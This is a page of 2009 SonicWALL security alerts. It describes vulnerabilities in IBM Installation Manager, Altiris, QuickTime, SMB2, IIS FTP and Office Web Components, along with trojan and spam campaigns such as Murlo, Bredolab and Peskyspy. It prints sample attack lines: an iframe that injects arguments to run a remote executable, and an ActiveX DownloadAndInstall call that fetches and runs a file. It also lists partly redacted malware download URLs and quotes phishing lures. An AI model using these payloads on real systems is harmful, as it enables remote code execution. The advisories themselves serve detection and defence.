Posts

IBM Installation Manager Code Execution (Oct 2, 2009)

/in /by

IBM Installation Manager (IIM) is a software tool that helps to install, update, modify, and install packages. Additionally, IIM helps to keep track of what has been installed, determine what is available for installation, and organize installation directories. IIM runs on Windows and Linux platforms.

IIM provides a set of installation wizards to manage packages. When IIM is installed it registers the application “IBMIM.exe” as the iim:// scheme handler. The format for the scheme is listed bellow:

iim://URI

The aforementioned URI will be executed in the following command:

IBMIM.exe -url "URI"

IIM IBMIM.exe has many command line arguments such as -ignoreRepositoryDigest, -accessRights and so on. The following example shows a command that execute with multiple arguments: 

IBMIM.exe -vm EXECUTABLE.EXE -url "www.google.com"

The above command can be invoked by the following HTML page:

< iframe src='iim://"%20-vm%20\x.x.x.xEXECUTABLE.EXE%20-url%20www.google.com"' >

There is an argument injection vulnerability in IBM Installation Manager. From the above example, we can see that a malicious executable file can be supplied as one of IBMIM.exe arguments with the iim:// scheme. A web browser may fail to sanitize the IIM URI before passing the URI to the registered application. An attacker exploiting this vulnerability can remotely control the arguments passed to the IIM executable, and inject/execute malicious programs.

SonicWALL has release an IPS signature to detect and block generic attack attempts targeting this vulnerability. The following signature has been released:

  • 2064 IBM Installation Manager iim URI Handling Code Execution Attempt

This vulnerability has not been assigned a Common Vulnerabilities and Exposures (CVE) identifier.

Altiris Deployment Solution File Execution (Sept 23, 2009)

/in /by

Symantec Altiris Deployment Solution is a set of tools that provide software deployment functions. It can be run on multiple platforms such as Windows, Linux and so on. And it can be used remotely to deploy an operating system or applications to multiple computers in a batch.

When Symantec Altiris Deployment Solution is used as a web console, an ActiveX control AeXNSPkgDLLib.dll has to be installed on the client. The associated ClassID for this control is “63716E93-033D-48B0-8A2F-8E8473FD7AC7” and its ProgID is “Altiris.AeXNSPkgDL”. It can be instantiated in a web page using the tag or via scripting. For example,

< object id="ctrl" classid="clsid:{63716E93-033D-48B0-8A2F-8E8473FD7AC7}" >

The ActiveX control has several methods which offer different functionalities. Download and DownloadAndInstall methods are among them. They have the following prototypes:

void Download(BSTR Src, BSTR Dest)

and

void DownloadAndInstall(BSTR Src, BSTR Dest,     BSTR InstCmdLine, BSTR UpgdCmdLine, BSTR ProdCode)

When the method Download or DownloadAndInstall is invoked on the ActiveX object, the file referenced by Src is downloaded via HTTP and copied to the path Dest on the web client’s system. For example,

obj.DownloadAndInstall("http://172.16.8.170/file.exe", "C:file.exe", "C:file.exe","","");

Where the remote file http://172.16.8.170/file.exe will be save as the local file “C:file.exe”. No confirmation dialog is presented to the user to alert them on the procedure.

Since a malicious program can easily be downloaded into the target without the user’s knowledge, this design flaw is considered as remote program execution vulnerability. In addition, DownloadAndInstall provides arbitrary program execution facility with its InstCmdLine parameter. These methods can be leveraged by attackers to execute arbitrary programs on the vulnerable host.

SonicWALL has release an IPS signature to detect and block generic attack attempts targeting this vulnerability. The following signature has been released:

  • IPS:4465 Symantec Altiris Deployment Solution ActiveX File Download

This vulnerability has not been assigned a Common Vulnerabilities and Exposures (CVE) identifier.

Fake Order – Murlo.CBA Trojan (September 22, 2009)

/in /by

SonicWALL UTM Research team observed a new Trojan being spammed via Fake order spam campaign starting September 19, 2009. The email has a zip archived attachment which contains the new Murlo Trojan variant.

SonicWALL has received more than 100,000 e-mail copies of this malware so far. The e-mail looks like:

Attachment: nz.zip (contains nz.exe)

Subject: Thank you for setting the order No.475456

Email Body:
————————
Dear customer!

Thank you for ordering at our online store.
Your order: Sony VAIO A1133651A, was sent at your address.
The tracking number of your postal parcel is indicated in the document attached to this letter.
Please, print out the postal label for receiving the parcel.

Internet Store.
————————

The e-mail message looks like below:

screenshot

The executable file inside the zip attachment is packed with PEPACK v1.0 and it looks like:

screenshot

The Trojan when executed performs following host level activity:

  • Connects and download malicious executable from:
    • http://weragumasekasu(REMOVED)M1B0cl5ZcR8S0j5PE3nJD2CR
    • http://84.16.224(REMOVED)out/1058/32/install.exe

  • Deletes the original file and drops following files:
    • c:1.exe [Detected as GAV: Kryptik.AKT (Trojan)]
    • (Program Files)AntivirusPro_2010AntivirusPro_2010.exe [Detected as GAV: FraudPack.TUH (Trojan)]
    • (System)braviax.exe [Detected as GAV: FraudPack.FOI (Trojan)]

  • Creates following registry entries to ensure that the malware runs upon system startup:
    • HKLMSOFTWAREMicrosoftWindowsCurrentVersionRunAntivirus Pro 2010 = “”(ProgramFiles)AntivirusPro_2010AntivirusPro_2010.exe” /hide”
    • HKCUSoftwareMicrosoftWindowsCurrentVersionRunbraviax = “%System%braviax.exe”

The Trojan is also known as Trojan.Downloader.JMJA [BitDefender], Trojan-Downloader.Murlo [Ikarus], and TR/Dldr.Murlo.cba [AntiVir].

SonicWALL Gateway AntiVirus provides protection against this malware via GAV: Murlo.CBA (Trojan) signature.[11,031,744 hits recorded starting September 19, 2009].

screenshot

Google Groups controlled Trojan (Sep 18, 2009)

/in /by

SonicWALL UTM Research team observed a new Trojan that utilizes Google groups message boards as their Command and Control (C&C) mechanism.

This is similar to the botnet reported last month that utilized Twitter, Jaiku and other microblogging sites as their C&C mechanism – Twitter botnet. However, this is the first instance of a Trojan using newsgroup for C&C messages.

This Trojan is distributed as a DLL file that may arrive via drive-by downloads with filename mslogin.dll. It performs following activities on the victim machine:

  • It creates a file in system directory: %System%tmw.dat which is used by Trojan for logging purpose.

  • It creates following registry entries:
    • HKEY_CURRENT_USERSoftwareMicrosoftInternet ExplorerInformationBar
    • HKEY_CURRENT_USERSoftwareMicrosoftInternet ExplorerIntelliForms

  • It tries to connect to https://www.google.com/accounts/Login and log onto escape2sun gmail account using the stored credentials.

  • Upon successful login, Trojan connects to the private Google group escape2sun and sends following GET request:
    • www.google.com/group/escape2sun/web/page1

    This page contains encrypted commands for the Trojan to execute which includes download and execute other malware executables. The result of command execution on victim machine are sent to the C&C server via HTTP Post request.

Note that Google groups is not responsible for this malicious behavior, but it was being misused by the author of Trojan for controlling the infected machines. Google has suspended the account and the private group (escape2sun) at the time of publishing this alert.

This malware is also known as W32/GrupBot [McAfee], Trojan:Win32/Gruwt.A [Microsoft], and TR/Dldr.Agent.bjta.9 [AntiVir].

SonicWALL Gateway AntiVirus provides protection against this malware via GAV: Agent.BJTA (Trojan) signature.

Apple QuickTime FlashPix Buffer Overflow (Sep 18, 2009)

/in /by

The QuickTime multimedia player supports a wide range of media formats. It is capable of parsing and displaying images as well as audio and video files. One of the image file formats supported by QuickTime is FlashPix.

The FlashPix format stores image data in multiple resolutions which makes for a larger file size but speeds up serving different resolutions of the image on demand. This comes particularly in handy when the image is requested by a web browser. Serving lower resolution of an image when needed decreases download time.

Space within a FlashPix file is divided into sectors of a default size of 512 bytes. There are numerous types of sectors all of which serve its own purpose such as Directory, DIF, and Storage types. The header of this FlashPIx file is also a separate type of sector which is always 512 bytes in size.
The structure of the FlashPix header is shown:

 Offset	Size	Description ------	-----	------------------------------------------------------------ 0x0000	8	0xd0cf11e0a1b11ae1 OR 0x0e11fc0dd0cf11e0 0x0008	16	class ID 0x0018	2	minor version 0x001a	2	major version 0x001c	2	byte order 0x001e	2	size of sectors in ^2 0x0020	2	size of mini-sectors in ^2 0x0022	2	reserved 0x0024	4	reserved 0x0028	4	reserved 0x002c	4	number of SECTs in the FAT chain 0x0030	4	first SECT in the FAT Directory chain

A buffer overflow vulnerability exists in the Apple QuickTime media player. The vulnerability is due to an integer overflow during the processing of malformed FlashPix files. The vulnerable code in QuickTimeImage.qtx does not properly validate the result of a multiplication operation involving two fields taken directly from the header of the FlashPix file. The product of these field values is then used without validation to allocate a heap memory buffer. In cases where the multiplication operation results in zero or a very small value, the buffer allocated is too small to hold the data copied into it during subsequent processing.

The data copied into the said buffer is sourced from the image file which is entirely under the attacker’s control. Exploitation of this flaw can result in injection of malicious code into the QuickTime application process and its eventual execution. Attackers can exploit this vulnerability by persuading a target user to open a malicious FlashPix image file using the vulnerable products.
SonicWALL has released an IPS signature that detects and blocks a specific attack attempt targeting this vulnerability. The following signature addresses this issue:

  • 4418 – Apple QuickTime FlashPix File BO Attempt

This vulnerability has been assigned CVE-2009-2798 by Mitre.

MS Windows SMB Negotiate Request DoS (Sep 11, 2009)

/in /by

Microsoft Windows operating systems ship with an implementation of the Server Message Block (SMB) protocol. SMB allows for sharing network devices and facilitates RPC among other functions. The service listens on TCP ports 139 and 445. SMB is a session oriented protocol requiring an initial handshake and optional authentication before a session is initiated. The session negotiation command has the code 0x72.

The following table illustrates an SMB header: 

Offset	Size		Description ------- ------- 	---------------------------------------------------------- 0x00	BYTE[4]		xffSMB 0x04	BYTE		Command code (0x72) 0x05	BYTE 		Error class 0x06	BYTE		Reserved 0x07	WORD		Error code 0x09	BYTE		Flags 0x0A	WORD		Flags2 0x0C	WORD		Process ID High 0x0E	DWORD[2] 	Signature 0x16	WORD 		Unused 0x18	WORD 		Tree ID 0x1A	WORD 		Process ID 0x1C	WORD 		User ID 0x1E	WORD 		Multiplex ID

There are several different versions of the Server Message Block (SMB) protocol. The client and server will negotiate which SMB dialect to use for the session during the negotiation phase. Typically, the client will send a list of requested dialects. Some of the available dialects follow: 

PC NETWORK PROGRAM 1.0 LANMAN1.0 NT LM 0.12

An upgrade of the SMB protocol, SMB2 was introduced with the release of Vista. The client can request an SMB2 session by including the dialect in the negotiation request.

A vulnerability exists within the SMB protocol implementation on some versions of Microsoft Windows. It is created by an error during indexing an array when processing SMB negotiation requests containing the SMB2 dialect. The flaw manifests itself during processing of the Process ID High field. The Process ID field value in the SMB header, constrained to 16 bits, may be extended to 32 bits by using the Process ID High field. This value is used, without any bounds checking, to index an array of function pointers. The function pointer is subsequently dereferenced and the function it points to is executed.

A remote unauthenticated attacker can leverage this vulnerability to terminate the Server service which results in kernel panic. While it is theoretically possible that this vulnerability can be exploited for code execution, it is highly unlikely as the attacker would be required to inject malicious code beforehand and know its exact location in memory. Thus, the most likely outcome of an exploitation attempt is the shutdown of the target machine. SonicWALL has release an IPS signature to detect and block generic attack attempts targeting this vulnerability. The following signature has been released:

  • 2032 – MS Windows SMB Negotiate Request DoS Attempt

The vulnerability has been assigned CVE-2009-3103 by Mitre. The vendor has released a security bulletin addressing this issue.

Multiple Spam Waves – Bredolab.X (Sep 11, 2009)

/in /by

SonicWALL UTM Research team has observed a strong increase in Bredolab.X spam campaigns in last 2 weeks. Bredolab.X was first spammed in early August, 2009 via UPS invoice spam campaign which was covered in Sonicalert – UPS Invoice spam – Bredolab.X Trojan .

SonicWALL has received more than 100,000 e-mail copies from these spam campaigns so far. The email messages in all these spam campains have a zip archived attachment which contains the Bredolab Trojan executable. The sample e-mail format from each spam campaign is shown below:

Campaign #1 – DHL spam

Attachment: Ma8c574c3.zip (contains Ma8c574c3.exe)

Subject: DHL Tracking Number [8-digit alpha-numeric number]

Email Body:
————————
Hello!

We were not able to deliver the postal package you have sent on the 16th of June in time because the recipient?s address is not correct.
Please print out the invoice copy attached and collect the package at our office.

DHL Delivery Services.
————————

Campaign #2 – PriceGrabber spam

Attachment: M5e786c73.zip (contains M5e786c73.exe)

Subject: Shipping confirmation for order – [Random 3-5 digit number]

Email Body:
————————
Hello!

Thank you for shopping at our internet store!
We have successfully received your payment.

Your order has been shipped to your billing address.
You have ordered Sony VAIO VGC-LT39U.

You can find your tracking number in attached to the e-mail document.
Please print the label to get your package.

We hope you enjoy your order!
Pricegrabber.com
————————

Campaign #3 – UPS Spam

Attachment: Me8541779.zip (contains Me8541779.exe)

Subject: UPS Tracking Number [Random 7 digit alpha-numeric number]

Email Body:
————————
Dear customer!

Unfortunately we were not able to deliver postal package which was sent on the 14th of July in time because the addressee’s address is erroneous.
Please print out the invoice copy attached and collect the package at our department.

Your United Parcel Service of America
————————

Campaign #4 – Western Union Spam

Attachment: Me8541779.zip (contains Me8541779.exe)

Subject: Western Union transfer is available for withdrawl

Email Body:
————————
Hello.

The amount of money transfer: 6567 USD.
Money is available to withdrawl.

You may find the Control number and receiver’s details in document attached to this email.

Western Union.
Customer Service.
————————

SonicWALL has received more than 200 distinct Bredolab.X variants through these spam campaigns. The Trojan is also known as Bredolab.gen trojan (McAfee), W32/Bredolab!Generic [F-Prot] and TrojanDownloader:Win32/Bredolab.X [Microsoft].

SonicWALL Gateway AntiVirus provided proactive protection against above spam campaigns via GAV: Bredolab.X_3 (Trojan) signature.[19,309,161 hits recorded starting August 18, 2009]. This signature proactively detected all Bredolab.X variants.

screenshot

IIS FTP Server Buffer Overflow (Sep 3, 2009)

/in /by

Microsoft Internet Information Server (IIS) is a collection of Internet service packages. The FTP server service of IIS provides functionality for exchanging and manipulating files over TCP.

One of the FTP commands supported by IIS is NLST (Name List). This command is used to transfer a directory listing from server to the FTP client. A typical NLST command looks like:

    NLST

If the pathname is NULL, the current directory is used.

A buffer overflow vulnerability exists within IIS FTP server service. Specifically, when a FTP user sends a NLST command with an overly long pathname, the vulnerable code copies the pathname into a fixed-size stack buffer without performing boundary check. Successful exploitation would overwrite critical process data (such as function return addresses), result in code execution with the privileges of FTP server service. An unsuccessful attack would cause the service to crash, result in a denial of service condition.

This vulnerability has been assigned as CVE-2009-3023. It affects the following IIS versions:
IIS 5.0
IIS 5.1
IIS 6.0 (denial of service only)

SonicWALL has released an IPS signature to detect and block specific exploitation attempts targeting this vulnerability. The signature is listed below:

  • 2023 – NLST Command BO Attempt

New Skype Trojan – Peskyspy (August 31, 2009)

/in /by

SonicWALL UTM Research team observed a new Skype Trojan that records Skype audio conversations on the victim machine, stores it in encrypted MP3 format, and relays it back to the hacker.

The Peskyspy Trojan injects a DLL file into Skype process on the victim machine. The DLL contains function calls to intercept all audio data input and output by the Skype process. This is done before Skype encrypts the data it sends over the network.

The Trojan extracts the PCM audio data and saves it locally as encrypted MP3 files. It sends these encrypted audio files back to the Attacker’s data server.

Screenshot of the Peskyspy Trojan in action is shown below –

screenshot

This Trojan is also known as Troj/Skytap-Gen [Sophos], Trojan.Skytap.A [BitDefender], and W32/Skytap.A [F-Prot].

SonicWALL Gateway AntiVirus provides protection against this malware via GAV: Peskyspy (Trojan) and GAV: Peskyspy_2 (Trojan) signatures.

OWC Remote Code Execution (Aug 27, 2009)

/in /by

Microsoft Office Web Components (OWC) provide a mechanism for data analysis and visualization. OWC can be divided into two groups — visible components and data controls. The data controls provide methods for connecting to data sources and retrieving data. If the control is instantiated, it attempts to provide data binding to the server controls. If the binding fails, it may release the object.

A memory corruption vulnerability exists in Microsoft Office Web Components controls. Specifically, the vulnerability exists in the initialization and release of the control object. In case that loading and releasing of the vulnerable control is repeated multiple times (through script code), the object attempts to read data from corrupted heap memory; as a result, flow of code execution may be changed. Remote attackers could exploit this vulnerability by enticing a target user to visit a maliciously crafted web page. Successful exploitation would result in code execution with the privileges of the logged in user. This vulnerability has been assigned as CVE-2009-0562.

By default the affected ActiveX controls are not installed on any Windows platform. However they are often installed with the popular MS Office suite and some server applications. This makes for a very large base of affected users.

The ClassIDs of the affected controls are:

0002E543-0000-0000-C000-000000000046
0002E553-0000-0000-C000-000000000046
0002E55B-0000-0000-C000-000000000046

The affected controls can also be instantiated using ProgIDs:

OWC10.DataSourceControl
OWC11.DataSourceControl

SonicWALL has released an IPS signature to detect and block specific exploitation attempts targeting this vulnerability. The signature is listed below:

  • 3144 – MS Office Web Components Remote Code Execution Attempt (MS09-043)

Pin It on Pinterest